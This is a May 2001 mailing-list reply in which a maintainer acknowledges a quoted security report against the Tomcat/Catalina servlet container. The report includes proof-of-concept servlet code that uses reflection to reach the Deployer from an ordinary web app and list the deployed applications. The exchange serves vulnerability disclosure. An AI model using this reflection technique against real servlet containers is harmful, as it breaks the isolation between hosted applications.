On 11 May 2001, Fabien Le Floc'h wrote:
> I apologize for repeating this, but I did not yet get any answer.
>
> I wrote a servlet in a classic WAR file at an arbitrary location and
> NOT in the org.apache.catalina package. From this servlet, I was able
> to access a method on the Deployer, i.e. I was able to access anything
> public in any Container "from outside". This is only working by using
> reflection.
>
I'm investigating this one (and another reported security issue) right
now. I've got an equivalent test case, so I won't need a war file.
Craig
> Here is the code (not clean, sorry about that) for the doGet method:
>
> response.setContentType("text/plain");
> PrintWriter writer = response.getWriter();
>
> Object theWrapper = (Object) this.getServletConfig();
> try {
> Method method = theWrapper.getClass().getMethod("getParent", new Class[]
>{});
>
> Object theContext = method.invoke(theWrapper, new Object[] {});
> method = theContext.getClass().getMethod("getParent", new Class[] {});
> Object theDeployer = method.invoke(theContext, new Object[] {});
> method = theDeployer.getClass().getMethod("findDeployedApps", new Class[]
>{});
> Object deployedApps = method.invoke(theDeployer, new Object[] {});
> String[] apps = (String[]) deployedApps;
> writer.println("detected apps:");
> for (int i=0; i<apps.length;i++) {
> writer.println(apps[i]);
> }
> } catch (Exception e) {
> e.printStackTrace();
> writer.println("An exception occured when invoking the method,
>"+e.getMessage());
> }
> writer.flush();
> writer.close();
>
>
>
> Conclusion: there is a security issue. We don't need the prerequisite to access
>Catalina core classes. I am really wondering how it would be possible to fix this
>security problem without an important redesign.
>
>
> Regards,
>
>
> Fabien
>
> P.S.: should I include a WAR file?
>
>
